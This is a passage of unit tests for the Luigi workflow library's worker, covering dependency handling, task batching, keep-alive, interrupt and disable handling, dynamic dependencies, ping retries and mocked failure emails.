            def requires(self):
                return a

            def run(self):
                self.has_run = True

            def complete(self):
                return self.has_run
        b = B()
        a.has_run = False
        b.has_run = False
        self.assertTrue(self.w.add(b))
        self.assertTrue(self.w.run())
        self.assertFalse(a.has_run)
        self.assertFalse(b.has_run)

    def test_externalized_dep(self):
        class A(Task):
            has_run = False

            def run(self):
                self.has_run = True

            def complete(self):
                return self.has_run
        a = A()

        class B(A):
            def requires(self):
                return luigi.task.externalize(a)
        b = B()
        self.assertTrue(self.w.add(b))
        self.assertTrue(self.w.run())
        self.assertFalse(a.has_run)
        self.assertFalse(b.has_run)

    def test_legacy_externalized_dep(self):
        # Setting run = NotImplemented is the legacy way of externalizing.
        class A(Task):
            has_run = False

            def run(self):
                self.has_run = True

            def complete(self):
                return self.has_run
        a = A()
        a.run = NotImplemented

        class B(A):
            def requires(self):
                return a
        b = B()
        self.assertTrue(self.w.add(b))
        self.assertTrue(self.w.run())
        self.assertFalse(a.has_run)
        self.assertFalse(b.has_run)

    def test_type_error_in_tracking_run_deprecated(self):
        class A(Task):
            num_runs = 0

            def complete(self):
                return False

            def run(self, tracking_url_callback=None):
                self.num_runs += 1
                raise TypeError('bad type')
        a = A()
        self.assertTrue(self.w.add(a))
        self.assertFalse(self.w.run())
        # Should only run and fail once, not retry because of the type error
        self.assertEqual(1, a.num_runs)

    def test_tracking_url(self):
        tracking_url = 'http://test_url.com/'

        class A(Task):
            has_run = False

            def complete(self):
                return self.has_run

            def run(self):
                self.set_tracking_url(tracking_url)
                self.has_run = True
        a = A()
        self.assertTrue(self.w.add(a))
        self.assertTrue(self.w.run())
        tasks = self.sch.task_list('DONE', '')
        self.assertEqual(1, len(tasks))
        self.assertEqual(tracking_url, tasks[a.task_id]['tracking_url'])

    def test_fail(self):
        # CustomException derives from BaseException to check that even
        # non-Exception failures are caught and reported.
        class CustomException(BaseException):
            def __init__(self, msg):
                self.msg = msg

        class A(Task):
            def run(self):
                self.has_run = True
                raise CustomException('bad things')

            def complete(self):
                return self.has_run
        a = A()

        class B(Task):
            def requires(self):
                return a

            def run(self):
                self.has_run = True

            def complete(self):
                return self.has_run
        b = B()
        a.has_run = False
        b.has_run = False
        self.assertTrue(self.w.add(b))
        self.assertFalse(self.w.run())
        self.assertTrue(a.has_run)
        self.assertFalse(b.has_run)

    def test_unknown_dep(self):
        # see related test_remove_dep test (grep for it)
        class A(ExternalTask):
            def complete(self):
                return False

        class C(Task):
            def complete(self):
                return True

        def get_b(dep):
            class B(Task):
                def requires(self):
                    return dep

                def run(self):
                    self.has_run = True

                def complete(self):
                    return False
            b = B()
            b.has_run = False
            return b
        b_a = get_b(A())
        b_c = get_b(C())
        self.assertTrue(self.w.add(b_a))
        # So now another worker goes in and schedules C -> B
        # This should remove the dep A -> B but will screw up the first worker
        self.assertTrue(self.w2.add(b_c))
        self.assertFalse(self.w.run())  # should not run anything - the worker should detect that A is broken
        self.assertFalse(b_a.has_run)
        # not sure what should happen??
        # self.w2.run()  # should run B since C is fulfilled
        # self.assertTrue(b_c.has_run)

    def test_unfulfilled_dep(self):
        class A(Task):
            def complete(self):
                return self.done

            def run(self):
                self.done = True

        def get_b(a):
            class B(A):
                def requires(self):
                    return a
            b = B()
            b.done = False
            a.done = True
            return b
        a = A()
        b = get_b(a)
        self.assertTrue(self.w.add(b))
        # a was complete at add() time but is reverted before run():
        # the worker must notice and run a again before b.
        a.done = False
        self.w.run()
        self.assertTrue(a.complete())
        self.assertTrue(b.complete())

    def test_check_unfulfilled_deps_config(self):
        class A(Task):
            i = luigi.IntParameter()

            def __init__(self, *args, **kwargs):
                super(A, self).__init__(*args, **kwargs)
                self.complete_count = 0
                self.has_run = False

            def complete(self):
                self.complete_count += 1
                return self.has_run

            def run(self):
                self.has_run = True

        class B(A):
            def requires(self):
                return A(i=self.i)
        # test the enabled features
        with Worker(scheduler=self.sch, worker_id='1') as w:
            w._config.check_unfulfilled_deps = True
            a1 = A(i=1)
            b1 = B(i=1)
            self.assertTrue(w.add(b1))
            self.assertEqual(a1.complete_count, 1)
            self.assertEqual(b1.complete_count, 1)
            w.run()
            self.assertTrue(a1.complete())
            self.assertTrue(b1.complete())
            # extra complete() call comes from the unfulfilled-deps check
            self.assertEqual(a1.complete_count, 3)
            self.assertEqual(b1.complete_count, 2)
        # test the disabled features
        with Worker(scheduler=self.sch, worker_id='2') as w:
            w._config.check_unfulfilled_deps = False
            a2 = A(i=2)
            b2 = B(i=2)
            self.assertTrue(w.add(b2))
            self.assertEqual(a2.complete_count, 1)
            self.assertEqual(b2.complete_count, 1)
            w.run()
            self.assertTrue(a2.complete())
            self.assertTrue(b2.complete())
            self.assertEqual(a2.complete_count, 2)
            self.assertEqual(b2.complete_count, 2)

    def test_gets_missed_work(self):
        class A(Task):
            done = False

            def complete(self):
                return self.done

            def run(self):
                self.done = True
        a = A()
        self.assertTrue(self.w.add(a))
        # simulate a missed get_work response
        self.assertEqual(a.task_id, self.sch.get_work(worker='X')['task_id'])
        self.assertTrue(self.w.run())
        self.assertTrue(a.complete())

    def test_avoid_infinite_reschedule(self):
        class A(Task):
            def complete(self):
                return False

        class B(Task):
            def complete(self):
                return False

            def requires(self):
                return A()
        self.assertTrue(self.w.add(B()))
        self.assertFalse(self.w.run())

    def test_fails_registering_signal(self):
        with mock.patch('luigi.worker.signal', spec=['signal']):
            # mock will raise an attribute error getting signal.SIGUSR1
            Worker()

    def test_allow_reschedule_with_many_missing_deps(self):
        class A(Task):
            """ Task that must run twice to succeed """
            i = luigi.IntParameter()
            runs = 0

            def complete(self):
                return self.runs >= 2

            def run(self):
                self.runs += 1

        class B(Task):
            done = False

            def requires(self):
                return map(A, range(20))

            def complete(self):
                return self.done

            def run(self):
                self.done = True
        b = B()
        w = Worker(scheduler=self.sch, worker_id='X', max_reschedules=1)
        self.assertTrue(w.add(b))
        self.assertFalse(w.run())
        # For b to be done, we must have rescheduled its dependencies to run them twice
        self.assertTrue(b.complete())
        self.assertTrue(all(a.complete() for a in b.deps()))

    def test_interleaved_workers(self):
        class A(DummyTask):
            pass
        a = A()

        class B(DummyTask):
            def requires(self):
                return a
        ExternalB = luigi.task.externalize(B)
        b = B()
        eb = ExternalB()
        self.assertEqual(str(eb), "B()")
        sch = Scheduler(retry_delay=100, remove_delay=1000, worker_disconnect_delay=10)
        with Worker(scheduler=sch, worker_id='X') as w, Worker(scheduler=sch, worker_id='Y') as w2:
            self.assertTrue(w.add(b))
            self.assertTrue(w2.add(eb))
            logging.debug("RUNNING BROKEN WORKER")
            self.assertTrue(w2.run())
            self.assertFalse(a.complete())
            self.assertFalse(b.complete())
            logging.debug("RUNNING FUNCTIONAL WORKER")
            self.assertTrue(w.run())
            self.assertTrue(a.complete())
            self.assertTrue(b.complete())

    def test_interleaved_workers2(self):
        # two tasks without dependencies, one external, one not
        class B(DummyTask):
            pass
        ExternalB = luigi.task.externalize(B)
        b = B()
        eb = ExternalB()
        self.assertEqual(str(eb), "B()")
        sch = Scheduler(retry_delay=100, remove_delay=1000, worker_disconnect_delay=10)
        with Worker(scheduler=sch, worker_id='X') as w, Worker(scheduler=sch, worker_id='Y') as w2:
            self.assertTrue(w2.add(eb))
            self.assertTrue(w.add(b))
            self.assertTrue(w2.run())
            self.assertFalse(b.complete())
            self.assertTrue(w.run())
            self.assertTrue(b.complete())

    def test_interleaved_workers3(self):
        class A(DummyTask):
            def run(self):
                logging.debug('running A')
                time.sleep(0.1)
                super(A, self).run()
        a = A()

        class B(DummyTask):
            def requires(self):
                return a

            def run(self):
                logging.debug('running B')
                super(B, self).run()
        b = B()
        sch = Scheduler(retry_delay=100, remove_delay=1000, worker_disconnect_delay=10)
        with Worker(scheduler=sch, worker_id='X', keep_alive=True, count_uniques=True) as w:
            with Worker(scheduler=sch, worker_id='Y', keep_alive=True, count_uniques=True, wait_interval=0.1, wait_jitter=0.05) as w2:
                self.assertTrue(w.add(a))
                self.assertTrue(w2.add(b))
                threading.Thread(target=w.run).start()
                self.assertTrue(w2.run())
                self.assertTrue(a.complete())
                self.assertTrue(b.complete())

    def test_die_for_non_unique_pending(self):
        class A(DummyTask):
            def run(self):
                logging.debug('running A')
                time.sleep(0.1)
                super(A, self).run()
        a = A()

        class B(DummyTask):
            def requires(self):
                return a

            def run(self):
                logging.debug('running B')
                super(B, self).run()
        b = B()
        sch = Scheduler(retry_delay=100, remove_delay=1000, worker_disconnect_delay=10)
        with Worker(scheduler=sch, worker_id='X', keep_alive=True, count_uniques=True) as w:
            with Worker(scheduler=sch, worker_id='Y', keep_alive=True, count_uniques=True, wait_interval=0.1, wait_jitter=0.05) as w2:
                self.assertTrue(w.add(b))
                self.assertTrue(w2.add(b))
                self.assertEqual(w._get_work()[0], a.task_id)
                self.assertTrue(w2.run())
                self.assertFalse(a.complete())
                self.assertFalse(b.complete())

    def test_complete_exception(self):
        "Tests that a task is still scheduled if its sister task crashes in the complete() method"
        class A(DummyTask):
            def complete(self):
                raise Exception("doh")
        a = A()

        class C(DummyTask):
            pass
        c = C()

        class B(DummyTask):
            def requires(self):
                return a, c
        b = B()
        sch = Scheduler(retry_delay=100, remove_delay=1000, worker_disconnect_delay=10)
        with Worker(scheduler=sch, worker_id="foo") as w:
            self.assertFalse(w.add(b))
            self.assertTrue(w.run())
            self.assertFalse(b.has_run)
            self.assertTrue(c.has_run)
            self.assertFalse(a.has_run)

    def test_requires_exception(self):
        class A(DummyTask):
            def requires(self):
                raise Exception("doh")
        a = A()

        class D(DummyTask):
            pass
        d = D()

        class C(DummyTask):
            def requires(self):
                return d
        c = C()

        class B(DummyTask):
            def requires(self):
                return c, a
        b = B()
        sch = Scheduler(retry_delay=100, remove_delay=1000, worker_disconnect_delay=10)
        with Worker(scheduler=sch, worker_id="foo") as w:
            self.assertFalse(w.add(b))
            self.assertTrue(w.run())
            self.assertFalse(b.has_run)
            self.assertTrue(c.has_run)
            self.assertTrue(d.has_run)
            self.assertFalse(a.has_run)

    def test_run_csv_batch_job(self):
        completed = set()

        class CsvBatchJob(luigi.Task):
            values = luigi.parameter.Parameter(batch_method=','.join)
            has_run = False

            def run(self):
                completed.update(self.values.split(','))
                self.has_run = True

            def complete(self):
                return all(value in completed for value in self.values.split(','))
        tasks = [CsvBatchJob(str(i)) for i in range(10)]
        for task in tasks:
            self.assertTrue(self.w.add(task))
        self.assertTrue(self.w.run())
        for task in tasks:
            self.assertTrue(task.complete())
            # the batched task instance ran, not the individual ones
            self.assertFalse(task.has_run)

    def test_run_max_batch_job(self):
        completed = set()

        class MaxBatchJob(luigi.Task):
            value = luigi.IntParameter(batch_method=max)
            has_run = False

            def run(self):
                completed.add(self.value)
                self.has_run = True

            def complete(self):
                return any(self.value <= ran for ran in completed)
        tasks = [MaxBatchJob(i) for i in range(10)]
        for task in tasks:
            self.assertTrue(self.w.add(task))
        self.assertTrue(self.w.run())
        for task in tasks:
            self.assertTrue(task.complete())
            # only task number 9 should run
            self.assertFalse(task.has_run and task.value < 9)

    def test_run_batch_job_unbatched(self):
        completed = set()

        class MaxNonBatchJob(luigi.Task):
            value = luigi.IntParameter(batch_method=max)
            has_run = False
            batchable = False

            def run(self):
                completed.add(self.value)
                self.has_run = True

            def complete(self):
                return self.value in completed
        tasks = [MaxNonBatchJob((i,)) for i in range(10)]
        for task in tasks:
            self.assertTrue(self.w.add(task))
        self.assertTrue(self.w.run())
        for task in tasks:
            self.assertTrue(task.complete())
            # batchable=False, so every single task must have run itself
            self.assertTrue(task.has_run)

    def test_run_batch_job_limit_batch_size(self):
        completed = set()
        runs = []

        class CsvLimitedBatchJob(luigi.Task):
            value = luigi.parameter.Parameter(batch_method=','.join)
            has_run = False
            max_batch_size = 4

            def run(self):
                completed.update(self.value.split(','))
                runs.append(self)

            def complete(self):
                return all(value in completed for value in self.value.split(','))
        tasks = [CsvLimitedBatchJob(str(i)) for i in range(11)]
        for task in tasks:
            self.assertTrue(self.w.add(task))
        self.assertTrue(self.w.run())
        for task in tasks:
            self.assertTrue(task.complete())
        # 11 tasks with max_batch_size 4 -> 3 batched runs
        self.assertEqual(3, len(runs))

    def test_fail_max_batch_job(self):
        class MaxBatchFailJob(luigi.Task):
            value = luigi.IntParameter(batch_method=max)
            has_run = False

            def run(self):
                self.has_run = True
                assert False

            def complete(self):
                return False
        tasks = [MaxBatchFailJob(i) for i in range(10)]
        for task in tasks:
            self.assertTrue(self.w.add(task))
        self.assertFalse(self.w.run())
        for task in tasks:
            # only task number 9 should run
            self.assertFalse(task.has_run and task.value < 9)
        self.assertEqual({task.task_id for task in tasks}, set(self.sch.task_list('FAILED', '')))

    def test_gracefully_handle_batch_method_failure(self):
        class BadBatchMethodTask(DummyTask):
            priority = 10
            batch_int_param = luigi.IntParameter(batch_method=int.__add__)  # should be sum
        bad_tasks = [BadBatchMethodTask(i) for i in range(5)]
        good_tasks = [DummyTask()]
        all_tasks = good_tasks + bad_tasks
        self.assertFalse(any(task.complete() for task in all_tasks))
        worker = Worker(scheduler=Scheduler(retry_count=1), keep_alive=True)
        for task in all_tasks:
            self.assertTrue(worker.add(task))
        self.assertFalse(worker.run())
        self.assertFalse(any(task.complete() for task in bad_tasks))
        # we only get to run the good task if the bad task failures were handled gracefully
        self.assertTrue(all(task.complete() for task in good_tasks))

    def test_post_error_message_for_failed_batch_methods(self):
        class BadBatchMethodTask(DummyTask):
            batch_int_param = luigi.IntParameter(batch_method=int.__add__)  # should be sum
        tasks = [BadBatchMethodTask(1), BadBatchMethodTask(2)]
        for task in tasks:
            self.assertTrue(self.w.add(task))
        self.assertFalse(self.w.run())
        failed_ids = set(self.sch.task_list('FAILED', ''))
        self.assertEqual({task.task_id for task in tasks}, failed_ids)
        # every failed task should carry a stored error message
        self.assertTrue(all(self.sch.fetch_error(task_id)['error'] for task_id in failed_ids))
class WorkerKeepAliveTests(LuigiTestCase):
    """Tests for the keep_alive / count_uniques / count_last_scheduled worker
    options: whether a worker thread stays alive while work might still appear.
    """

    def setUp(self):
        self.sch = Scheduler()
        super(WorkerKeepAliveTests, self).setUp()

    def _worker_keep_alive_test(self, first_should_live, second_should_live, task_status=None, **worker_args):
        """Start two workers on the same DummyTask and assert thread liveness.

        :param first_should_live: whether worker 1's run() thread should still be alive
        :param second_should_live: whether worker 2's run() thread should still be alive
        :param task_status: optional status forced onto the task mid-test
        """
        worker_args.update({
            'scheduler': self.sch,
            'worker_processes': 0,
            'wait_interval': 0.01,
            'wait_jitter': 0.0,
        })
        w1 = Worker(worker_id='w1', **worker_args)
        w2 = Worker(worker_id='w2', **worker_args)
        with w1 as worker1, w2 as worker2:
            worker1.add(DummyTask())
            t1 = threading.Thread(target=worker1.run)
            t1.start()
            worker2.add(DummyTask())
            t2 = threading.Thread(target=worker2.run)
            t2.start()
            if task_status:
                self.sch.add_task(worker='DummyWorker', task_id=DummyTask().task_id, status=task_status)
            # allow workers to run their get work loops a few times
            time.sleep(0.1)
            try:
                # Thread.isAlive() was removed in Python 3.9; is_alive() has
                # been available since Python 2.6, so this stays py2-compatible.
                self.assertEqual(first_should_live, t1.is_alive())
                self.assertEqual(second_should_live, t2.is_alive())
            finally:
                # mark the task done so the worker threads will die
                self.sch.add_task(worker='DummyWorker', task_id=DummyTask().task_id, status='DONE')
                t1.join()
                t2.join()

    def test_no_keep_alive(self):
        self._worker_keep_alive_test(
            first_should_live=False,
            second_should_live=False,
        )

    def test_keep_alive(self):
        self._worker_keep_alive_test(
            first_should_live=True,
            second_should_live=True,
            keep_alive=True,
        )

    def test_keep_alive_count_uniques(self):
        self._worker_keep_alive_test(
            first_should_live=False,
            second_should_live=False,
            keep_alive=True,
            count_uniques=True,
        )

    def test_keep_alive_count_last_scheduled(self):
        self._worker_keep_alive_test(
            first_should_live=False,
            second_should_live=True,
            keep_alive=True,
            count_last_scheduled=True,
        )

    def test_keep_alive_through_failure(self):
        self._worker_keep_alive_test(
            first_should_live=True,
            second_should_live=True,
            keep_alive=True,
            task_status='FAILED',
        )

    def test_do_not_keep_alive_through_disable(self):
        self._worker_keep_alive_test(
            first_should_live=False,
            second_should_live=False,
            keep_alive=True,
            task_status='DISABLED',
        )
class WorkerInterruptedTest(unittest.TestCase):
    # Tests SIGUSR1 handling: after the interrupt the worker should stop
    # asking for new work but still shut down cleanly.

    def setUp(self):
        self.sch = Scheduler(retry_delay=100, remove_delay=1000, worker_disconnect_delay=10)

    # Skip decorator for platforms without SIGUSR1 (e.g. Windows).
    requiring_sigusr = unittest.skipUnless(hasattr(signal, 'SIGUSR1'),
                                           'signal.SIGUSR1 not found on this system')

    def _test_stop_getting_new_work(self, worker):
        d = DummyTask()
        with worker:
            worker.add(d)  # For assistant its ok that other tasks add it
            self.assertFalse(d.complete())
            # Simulate the signal handler firing, then run: the task must
            # NOT be picked up afterwards.
            worker.handle_interrupt(signal.SIGUSR1, None)
            worker.run()
            self.assertFalse(d.complete())

    @requiring_sigusr
    def test_stop_getting_new_work(self):
        self._test_stop_getting_new_work(
            Worker(scheduler=self.sch))

    @requiring_sigusr
    def test_stop_getting_new_work_assistant(self):
        self._test_stop_getting_new_work(
            Worker(scheduler=self.sch, keep_alive=False, assistant=True))

    @requiring_sigusr
    def test_stop_getting_new_work_assistant_keep_alive(self):
        self._test_stop_getting_new_work(
            Worker(scheduler=self.sch, keep_alive=True, assistant=True))

    def test_existence_of_disabling_option(self):
        # any code equivalent of `os.kill(os.getpid(), signal.SIGUSR1)`
        # seem to give some sort of a "InvocationError"
        Worker(no_install_shutdown_handler=True)

    @with_config({"worker": {"no_install_shutdown_handler": "True"}})
    def test_can_run_luigi_in_thread(self):
        class A(DummyTask):
            pass
        task = A()
        # Note that ``signal.signal(signal.SIGUSR1, fn)`` can only be called in the main thread.
        # So if we do not disable the shutdown handler, this would fail.
        t = threading.Thread(target=lambda: luigi.build([task], local_scheduler=True))
        t.start()
        t.join()
        self.assertTrue(task.complete())
class WorkerDisabledTest(LuigiTestCase):
    """Checks that a worker stops fetching work once the scheduler disables
    it, both when driven manually and through luigi.build().
    """

    def make_sch(self):
        return Scheduler(retry_delay=100, remove_delay=1000, worker_disconnect_delay=10)

    def _test_stop_getting_new_work_build(self, sch, worker):
        """Disable the worker from inside a running task via luigi.build().

        Added because the execution summary used to crash in this scenario.
        """
        class KillWorkerTask(luigi.Task):
            did_actually_run = False

            def run(self):
                sch.disable_worker('my_worker_id')
                KillWorkerTask.did_actually_run = True

        class Factory(object):
            def create_local_scheduler(self, *args, **kwargs):
                return sch

            def create_worker(self, *args, **kwargs):
                return worker

        luigi.build([KillWorkerTask()], worker_scheduler_factory=Factory(), local_scheduler=True)
        self.assertTrue(KillWorkerTask.did_actually_run)

    def _test_stop_getting_new_work_manual(self, sch, worker):
        """Disable the worker directly on the scheduler, then run()."""
        d = DummyTask()
        with worker:
            worker.add(d)  # For assistant its ok that other tasks add it
            self.assertFalse(d.complete())
            sch.disable_worker('my_worker_id')
            worker.run()  # Note: Test could fail by hanging on this line
            self.assertFalse(d.complete())

    def _test_stop_getting_new_work(self, **worker_kwargs):
        worker_kwargs['worker_id'] = 'my_worker_id'
        # Exercise both styles on fresh schedulers: manual first, then build.
        for check in (self._test_stop_getting_new_work_manual,
                      self._test_stop_getting_new_work_build):
            sch = self.make_sch()
            worker_kwargs['scheduler'] = sch
            check(sch, Worker(**worker_kwargs))

    def test_stop_getting_new_work_keep_alive(self):
        self._test_stop_getting_new_work(keep_alive=True, assistant=False)

    def test_stop_getting_new_work_assistant(self):
        self._test_stop_getting_new_work(keep_alive=False, assistant=True)

    def test_stop_getting_new_work_assistant_keep_alive(self):
        self._test_stop_getting_new_work(keep_alive=True, assistant=True)
class DynamicDependenciesTest(unittest.TestCase):
    """End-to-end checks for tasks that yield dynamic dependencies."""

    n_workers = 1
    timeout = float('inf')

    def setUp(self):
        self.p = tempfile.mkdtemp()

    def tearDown(self):
        shutil.rmtree(self.p)

    def test_dynamic_dependencies(self, use_banana_task=False):
        start = time.time()
        task = DynamicRequires(p=self.p, use_banana_task=use_banana_task)
        luigi.build([task], local_scheduler=True, workers=self.n_workers)
        self.assertTrue(task.complete())
        # loop through output and verify
        with task.output().open('r') as f:
            for i in range(7):
                self.assertEqual(f.readline().strip(), '%d: Done!' % i)
        self.assertTrue(time.time() - start < self.timeout)

    def test_dynamic_dependencies_with_namespace(self):
        self.test_dynamic_dependencies(use_banana_task=True)

    def test_dynamic_dependencies_other_module(self):
        task = DynamicRequiresOtherModule(p=self.p)
        luigi.build([task], local_scheduler=True, workers=self.n_workers)
        self.assertTrue(task.complete())
class DynamicDependenciesWithMultipleWorkersTest(DynamicDependenciesTest):
    # Re-run the dynamic-dependency tests with many workers so the 0.5s
    # sleeps in DynamicDummyTask overlap; timeout enforces parallelism.
    n_workers = 100
    timeout = 3.0  # We run 7 tasks that take 0.5s each so it should take less than 3.5s
class WorkerPingThreadTests(unittest.TestCase):
    # Tests for the worker's background keep-alive (ping) thread.

    def test_ping_retry(self):
        """ Worker ping fails once. Ping continues to try to connect to scheduler

        Kind of ugly since it uses actual timing with sleep to test the thread
        """
        sch = Scheduler(
            retry_delay=100,
            remove_delay=1000,
            worker_disconnect_delay=10,
        )
        self._total_pings = 0  # class var so it can be accessed from fail_ping

        def fail_ping(worker):
            # this will be called from within keep-alive thread...
            self._total_pings += 1
            raise Exception("Some random exception")
        # Monkey-patch the scheduler's ping so every ping raises.
        sch.ping = fail_ping
        with Worker(
                scheduler=sch,
                worker_id="foo",
                ping_interval=0.01  # very short between pings to make test fast
                ):
            # let the keep-alive thread run for a bit...
            time.sleep(0.1)  # yes, this is ugly but it's exactly what we need to test
        self.assertTrue(
            self._total_pings > 1,
            msg="Didn't retry pings (%d pings performed)" % (self._total_pings,)
        )

    def test_ping_thread_shutdown(self):
        # The ping thread must be alive inside the context manager and
        # stopped once the worker exits it.
        with Worker(ping_interval=0.01) as w:
            self.assertTrue(w._keep_alive_thread.is_alive())
        self.assertFalse(w._keep_alive_thread.is_alive())
def email_patch(test_func, email_config=None):
    """Test decorator that captures outgoing emails instead of sending them.

    The wrapped test receives a list that accumulates every message the
    (mocked) SMTP client would have sent. ``email_config`` optionally
    overrides the default email configuration.
    """
    config = {"email": {"receiver": "not-a-real-email-address-for-test-only", "force_send": "true"}}
    if email_config is not None:
        config.update(email_config)
    emails = []

    def mock_send_email(sender, recipients, msg):
        emails.append(msg)

    @with_config(config)
    @functools.wraps(test_func)
    @mock.patch('smtplib.SMTP')
    def run_test(self, smtp):
        smtp().sendmail.side_effect = mock_send_email
        test_func(self, emails)

    return run_test
def custom_email_patch(config):
    # Like email_patch, but pre-bound with extra email-config overrides.
    return functools.partial(email_patch, email_config=config)
class WorkerEmailTest(LuigiTestCase):
    """Tests that the worker sends (or batches, or suppresses) error emails
    for scheduling failures, run failures, timeouts and dead task processes.
    """

    def run(self, result=None):
        # Wrap every test with a scheduler and a worker bound as self.worker.
        super(WorkerEmailTest, self).setUp()
        sch = Scheduler(retry_delay=100, remove_delay=1000, worker_disconnect_delay=10)
        with Worker(scheduler=sch, worker_id="foo") as self.worker:
            super(WorkerEmailTest, self).run(result)

    @email_patch
    def test_connection_error(self, emails):
        sch = RemoteScheduler('http://tld.invalid:1337', connect_timeout=1)
        self.waits = 0

        def dummy_wait():
            self.waits += 1
        sch._wait = dummy_wait

        class A(DummyTask):
            pass
        a = A()
        self.assertEqual(emails, [])
        with Worker(scheduler=sch) as worker:
            try:
                worker.add(a)
            except RPCError:
                self.assertEqual(self.waits, 2)  # should attempt to add it 3 times
                self.assertNotEqual(emails, [])
                self.assertTrue(emails[0].find("Luigi: Framework error while scheduling %s" % (a,)) != -1)
            else:
                self.fail()

    @email_patch
    def test_complete_error(self, emails):
        class A(DummyTask):
            def complete(self):
                raise Exception("b0rk")
        a = A()
        self.assertEqual(emails, [])
        self.worker.add(a)
        self.assertTrue(emails[0].find("Luigi: %s failed scheduling" % (a,)) != -1)
        self.worker.run()
        self.assertTrue(emails[0].find("Luigi: %s failed scheduling" % (a,)) != -1)
        self.assertFalse(a.has_run)

    @with_config({'batch_email': {'email_interval': '0'}, 'worker': {'send_failure_email': 'False'}})
    @email_patch
    def test_complete_error_email_batch(self, emails):
        class A(DummyTask):
            def complete(self):
                raise Exception("b0rk")
        scheduler = Scheduler(batch_emails=True)
        worker = Worker(scheduler)
        a = A()
        self.assertEqual(emails, [])
        worker.add(a)
        self.assertEqual(emails, [])
        worker.run()
        self.assertEqual(emails, [])
        self.assertFalse(a.has_run)
        # pruning flushes the batched failure email
        scheduler.prune()
        self.assertTrue("1 scheduling failure" in emails[0])

    @with_config({'batch_email': {'email_interval': '0'}, 'worker': {'send_failure_email': 'False'}})
    @email_patch
    def test_complete_error_email_batch_to_owner(self, emails):
        class A(DummyTask):
            owner_email = 'a_owner@test.com'

            def complete(self):
                raise Exception("b0rk")
        scheduler = Scheduler(batch_emails=True)
        worker = Worker(scheduler)
        a = A()
        self.assertEqual(emails, [])
        worker.add(a)
        self.assertEqual(emails, [])
        worker.run()
        self.assertEqual(emails, [])
        self.assertFalse(a.has_run)
        scheduler.prune()
        self.assertTrue(any(
            "1 scheduling failure" in email and 'a_owner@test.com' in email
            for email in emails))

    @email_patch
    def test_announce_scheduling_failure_unexpected_error(self, emails):
        class A(DummyTask):
            owner_email = 'a_owner@test.com'

            def complete(self):
                pass
        scheduler = Scheduler(batch_emails=True)
        worker = Worker(scheduler)
        a = A()
        with mock.patch.object(worker._scheduler, 'announce_scheduling_failure', side_effect=Exception('Unexpected')),\
                self.assertRaises(Exception):
            worker.add(a)
        self.assertTrue(len(emails) == 2)  # One for `complete` error, one for exception in announcing.
        self.assertTrue('Luigi: Framework error while scheduling' in emails[1])
        self.assertTrue('a_owner@test.com' in emails[1])

    @email_patch
    def test_requires_error(self, emails):
        class A(DummyTask):
            def requires(self):
                raise Exception("b0rk")
        a = A()
        self.assertEqual(emails, [])
        self.worker.add(a)
        self.assertTrue(emails[0].find("Luigi: %s failed scheduling" % (a,)) != -1)
        self.worker.run()
        self.assertFalse(a.has_run)

    @with_config({'batch_email': {'email_interval': '0'}, 'worker': {'send_failure_email': 'False'}})
    @email_patch
    def test_requires_error_email_batch(self, emails):
        class A(DummyTask):
            def requires(self):
                raise Exception("b0rk")
        scheduler = Scheduler(batch_emails=True)
        worker = Worker(scheduler)
        a = A()
        self.assertEqual(emails, [])
        worker.add(a)
        self.assertEqual(emails, [])
        worker.run()
        self.assertFalse(a.has_run)
        scheduler.prune()
        self.assertTrue("1 scheduling failure" in emails[0])

    @email_patch
    def test_complete_return_value(self, emails):
        class A(DummyTask):
            def complete(self):
                pass  # no return value should be an error
        a = A()
        self.assertEqual(emails, [])
        self.worker.add(a)
        self.assertTrue(emails[0].find("Luigi: %s failed scheduling" % (a,)) != -1)
        self.worker.run()
        self.assertTrue(emails[0].find("Luigi: %s failed scheduling" % (a,)) != -1)
        self.assertFalse(a.has_run)

    @with_config({'batch_email': {'email_interval': '0'}, 'worker': {'send_failure_email': 'False'}})
    @email_patch
    def test_complete_return_value_email_batch(self, emails):
        class A(DummyTask):
            def complete(self):
                pass  # no return value should be an error
        scheduler = Scheduler(batch_emails=True)
        worker = Worker(scheduler)
        a = A()
        self.assertEqual(emails, [])
        worker.add(a)
        self.assertEqual(emails, [])
        # Run the batch-email worker. This previously called self.worker.run(),
        # which drives the unrelated shared worker/scheduler; fixed for
        # consistency with the other *_email_batch tests above.
        worker.run()
        self.assertEqual(emails, [])
        self.assertFalse(a.has_run)
        scheduler.prune()
        self.assertTrue("1 scheduling failure" in emails[0])

    @email_patch
    def test_run_error(self, emails):
        class A(luigi.Task):
            def run(self):
                raise Exception("b0rk")
        a = A()
        luigi.build([a], workers=1, local_scheduler=True)
        self.assertEqual(1, len(emails))
        self.assertTrue(emails[0].find("Luigi: %s FAILED" % (a,)) != -1)

    @with_config({'batch_email': {'email_interval': '0'}, 'worker': {'send_failure_email': 'False'}})
    @email_patch
    def test_run_error_email_batch(self, emails):
        class A(luigi.Task):
            owner_email = ['a@test.com', 'b@test.com']

            def run(self):
                raise Exception("b0rk")
        scheduler = Scheduler(batch_emails=True)
        worker = Worker(scheduler)
        worker.add(A())
        worker.run()
        scheduler.prune()
        # one email to the default receiver plus one per owner address
        self.assertEqual(3, len(emails))
        self.assertTrue(any('a@test.com' in email for email in emails))
        self.assertTrue(any('b@test.com' in email for email in emails))

    @with_config({'batch_email': {'email_interval': '0'}, 'worker': {'send_failure_email': 'False'}})
    @email_patch
    def test_run_error_batch_email_string(self, emails):
        class A(luigi.Task):
            owner_email = 'a@test.com'

            def run(self):
                raise Exception("b0rk")
        scheduler = Scheduler(batch_emails=True)
        worker = Worker(scheduler)
        worker.add(A())
        worker.run()
        scheduler.prune()
        self.assertEqual(2, len(emails))
        self.assertTrue(any('a@test.com' in email for email in emails))

    @with_config({'worker': {'send_failure_email': 'False'}})
    @email_patch
    def test_run_error_no_email(self, emails):
        class A(luigi.Task):
            def run(self):
                raise Exception("b0rk")
        luigi.build([A()], workers=1, local_scheduler=True)
        self.assertFalse(emails)

    @staticmethod
    def read_email(email_msg):
        # Parse a raw captured email into (subject, decoded body) strings.
        subject_obj, body_obj = email.parser.Parser().parsestr(email_msg).walk()
        return str(subject_obj['Subject']), str(body_obj.get_payload(decode=True))

    @email_patch
    def test_task_process_dies_with_email(self, emails):
        a = SendSignalTask(signal.SIGKILL)
        luigi.build([a], workers=2, local_scheduler=True)
        self.assertEqual(1, len(emails))
        subject, body = self.read_email(emails[0])
        self.assertIn("Luigi: {} FAILED".format(a), subject)
        self.assertIn("died unexpectedly with exit code -9", body)

    @with_config({'worker': {'send_failure_email': 'False'}})
    @email_patch
    def test_task_process_dies_no_email(self, emails):
